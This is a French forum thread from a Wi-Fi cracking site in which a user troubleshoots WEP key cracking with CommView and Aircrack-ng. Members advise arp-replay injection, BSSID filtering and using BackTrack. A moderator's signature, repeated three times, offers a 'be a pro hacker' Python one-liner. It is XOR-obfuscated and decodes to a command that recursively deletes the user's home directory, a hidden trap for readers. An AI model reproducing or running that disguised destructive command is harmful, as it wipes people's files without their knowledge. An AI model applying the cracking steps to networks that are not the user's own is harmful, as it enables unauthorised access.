Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-03-2012 18:51:02

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Bug avec Aircrack-ng

Bonjour à tous,
Depuis peut j’essaie de cracker des clés WEP mais sans succès.
J’utilise CommView For Wifi et Aircrack ng.
Je reçois des paquets, je les enregistre puis quand je les ouvres avec aircrack tous les IVS sont répartis sur 25000 lignes et il n'y a pas les nom des connexion :

Exemple en image :


commvi10.jpg


Que dois-je faire ?

Merci
A+

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 11-03-2012 20:09:40

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Bug avec Aircrack-ng

Dis nous tout ce que tu as fait pour en arriver là.
Et note le fait que tu as quand même un handshake.
J'espère que c'est bien ton réseau que tu attaques.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 11-03-2012 21:14:02

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

Oui oui c'est mon réseau smile

Donc j'ai téléchargé commview ,installé les drivers, décliqué le bouton "capture management paquets", j'ai configuré le logiciel dans la partie logging en cliquant sur auto saving et j'ai entré les valeurs 50 000 et 90 puis j'ai donné l’accès jusqu’à mon bureau pour les recevoir dessus.
Puis je clique sur start capture et je fais une recherche de réseaux. je trouve le mien (clé WEP) sur le "channel" 11 , je clique dessus et je fais start capture.j'attends plusieurs heures puis je quitte le logiciel.
Il m'a enregistré 3 fichiers sur le bureau , je les enregistres tous dans le format CAP dans le même dossier que AirCrack.
Je vais dans bin et j'ouvre AirCrack ng GUI, je change 128 bits en 64 je met les 3 fichiers CAP dans la partie "choose" puis je fait launch.

Arrivé ici j'attend 30 secondes et pleins de lignes s'affichent (25 000) du coup je ne peut pas remonter pour voir quel chiffre mettre , j'ai essayé les 10 preemiers chiffres sans succès et pour l'impre-écran j'ai galéré pour attraper le curseur qui fait défilé la page vers le bas dès qu'il se déclenche, une fois attrapé je remonte et que vois-je ? la même image que je vous ais montré c'est à dire sans aucun nom de réseau ...

Je tient à préciser que sur le "channel" où se trouve mon réseau il y en a environ 10 autres donc ddu coup ce n'est pas le seul à envoyé des paquets ^^

Et qu'est ce qu'est un handshake ? et je ne suis pas sur qu'il m’intéresse puisqu'il est sur une clé WPA qui n'est donc pas la mienne smile

Voilà si ce n'est pas clair désolé ^^
Merci
A+

Hors Ligne

#4 12-03-2012 17:51:37

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

J'ai laisser tourner commview toute la nuit, il me dit qu'il 1 000 000 de paquets les lendemain.
Mais mon réseau en a 100 000 et si j'ajoute tous les réseau écrit sa ne fait que 200 000 paquets !
dans l'invite des commandes j'ai trouvé mon adresse mac et sa dit 350 IVS , récolté juste 350 IVS en 24 heures et celui qui a un handshake soit 67 000 IVS n'est pas sur la liste de réseau u_u

Vous avez une solution ?
J'ai pas envie d'attendre un mois pour que sa marche ^^

A+

Hors Ligne

#5 12-03-2012 18:26:45

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Bug avec Aircrack-ng

Tu sais qu'il faut faire une attaque pendant la capture ? (ex : arp-replay) pour générer du trafic. et donc des IVs.
Tu devrais dire à airodump de n'écouter que le channel 11, et que ton AP (Access Point = box).
Ah, et 128bits en 64 tu sais que c'est la longueur de la clef du réseau WEP, et pas l'architecture de ton processeur ? (on ne sait jamais)

Je te conseille d'utiliser backtrack 5 sur une machine virtuelle et de suivre le tuto du site.
On poura plus t'aider. Perso, les adaptations d'aircrack pour windows, en GUI, je connais pas trop du tout.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 12-03-2012 18:32:40

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

Est ce que tu sais comment faire l'attaque durant la capture sur windows seven ?
J'ai cherché mais je n'ai rien trouvé...

Et je n'arrive pas non plus à qu'il n'écoute que ma box ^^

Hors Ligne

#7 12-03-2012 19:18:20

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bug avec Aircrack-ng

Peu nombreux sont les adpatateurs compatibles avec injection sous windows et malheureusement  pour les amants de la fenêtre, pas mal de produits munis des chipsets atheros 100% compatibles avec windows ne sont plus construits...
J'ajoute que même les chipsets 100% compatible fonctionnent moins bien que sous linux (ex: injection limitée à 300 datas/secondes sous windows alors que certain de ces chipsets peuvent atteindre alègrment les 800 - 1000 datas segondes avec linux)
Dans ton cas il faudrait que tu actives le filtre bssid en plus du filtre canal - en ligne de commande tu rajoutes       "--bssid 00:11:22:33:44:55" (remplace les valeurs par celles de ton routeur).
Si j'étais toi je suivrais les conseils de Spawn et essayerais backtrack 5 r2 qui est sans aucun doute l'une des meilleures version de la distribution référence dans notre domaine. wink

Hors Ligne

#8 13-03-2012 19:03:20

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

Salut,
J'ai installer BackTrack 5 R1 sur une machine virtuelle et quand j'entre la commande : # airmon-ng start wlan0
Je n'ai rien en dessous de interface, chipset et Driver.
Du coup si je tape : # airodump-ng mon0
ça me dit failed : no such device.

Que dois-je faire ?

Merci
A+

Hors Ligne

#9 13-03-2012 19:26:00

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Bug avec Aircrack-ng

Kratos96 a écrit :

Que dois-je faire ?

Une recherche roll

Hors Ligne

#10 13-03-2012 20:02:29

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

Ne t'inquiète pas j'ai bien cherché et je n'ai pas trouvé sur ce forum smile
Sur internet j'ai cru comprendre que mon problème pouvait avoir quelque chose en rapport avec une carte Wifi, c'est possible ?

a+

Hors Ligne

#11 14-03-2012 01:55:19

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Bug avec Aircrack-ng

Personne ne s’inquiète ici !

Quand tu saisis ("iwconfig") ou ("ifconfig") ton interface (Wlan0) apparaît-elle à coté des autres interfaces (etho) et (lo) ? laquelle des cartes wifi utilises-tu avec BT5 ? on ne cesse de le répéter depuis belle lurette que les cartes internes de l'ordinateur ne sont pas reconnues par BT installée sur une machine virtuelle. En tapant aussi ("lspci") tu peux voir si ta carte apparaît dans la liste des périphériques wink

Dernière modification par Fuji (14-03-2012 02:04:25)

Hors Ligne

#12 14-03-2012 20:25:24

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bug avec Aircrack-ng

Parles pour toi! Moi j'étais super inquiet, je n'ai pas fermé l'œil de la nuit! lol

Hors Ligne

#13 14-03-2012 21:33:33

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Bug avec Aircrack-ng

Hmmm tu n'as pas du chercher bien loin.
Cherche encore.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#14 23-03-2012 19:31:41

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

J'ai finalement décidé de mettre backTrack sur une liveUsb,
est ce que après avoir suivi ce tuto : http://www.crack-wifi.com/Downloads/res … n.Live.pdf
Il ne me reste plus qu'a mettre le clé usb en premier dans l'ordre de boot où il y a quelque chose d'autre à faire ?
Et est ce que c'est sans risque ? parce que mon ordi et neuf et donc j'ai pas envie de l'abimer xD
Merci
A+

Hors Ligne

#15 27-03-2012 20:26:16

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

Et est ce que un fois fini le bidouillage je retrouverai Windows 7 comme je l'avais laissé ?
Merci
A+

Hors Ligne

#16 13-04-2012 20:46:55

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Bug avec Aircrack-ng

up big_smile

Hors Ligne

#17 06-03-2014 21:15:18

rEDkILLER
N00b
Inscription : 06-03-2014
Messages : 1

Re : Bug avec Aircrack-ng

Oui c'est trop tard mais je viens juste de découvrir ce forum et Tard vaut mieux que Jamais non =P

Il t'aurai fallu décocher la capture des paquets endommagés dans option -> général (en anglais : Capture Damaged Packets). Tu te retrouveras avec juste des channels de nombre égaux au Wifi captés

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
2 162 04-12-2016 21:54:52 par GreyBird
0 187 02-12-2016 21:32:19 par tit64
aircrack-ng par baltigor
2 180 30-11-2016 20:46:48 par koala
4 334 20-11-2016 14:31:08 par richie
Épinglée :
21 14728 20-11-2016 12:53:07 par richie

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.036 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]